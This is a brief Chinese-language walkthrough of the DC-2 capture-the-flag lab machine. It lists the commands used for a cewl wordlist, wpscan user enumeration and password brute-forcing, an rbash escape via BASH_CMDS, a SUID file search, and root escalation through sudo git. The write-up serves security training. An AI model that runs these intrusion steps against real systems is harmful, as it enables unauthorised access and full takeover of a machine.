- 一、扫描ip地址
直接查看无法查看,所以在kali中的hosts中进行配置
- 二、
flag中提示用cewl,使用cewl生成字典进行爆破;
- 三、
使用wpscan进行当前用户的扫描:
wpscan --url http://dc-2
wpscan --url http://dc-2/ -e
- 四、漏洞攻击
利用wpscan来进行密码的爆破;先将之前爆破的用户与之前在页面的flag作的密码结合进行爆破
touch username.txt
vim username.txt
wpscan --url http://dc-2/ -U username.txt -P pwd.txt
目录扫描:
dirb http://dc-2
使用jerry进行登录
在当前路径下发现flag3,使用less进行flag3的读取
无法使用su来跳到jerry用户
因为无法使用su命令所以需要绕过rbash(受限制的bash)
tom@DC‐2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC‐2:~$ export PATH=$PATH:/bin/
tom@DC‐2:~$ export PATH=$PATH:/usr/bin
- 五、提权
find / -perm -u=s -type f 2>/dev/null
参考文章:https://laosec.cn/2021/05/11/%e9%9d%b6%e6%9c%ba%e7%b3%bb%e5%88%97-dc_2/
附:修改root用户密码;
sudo git -p help config
!whoami
!passwd root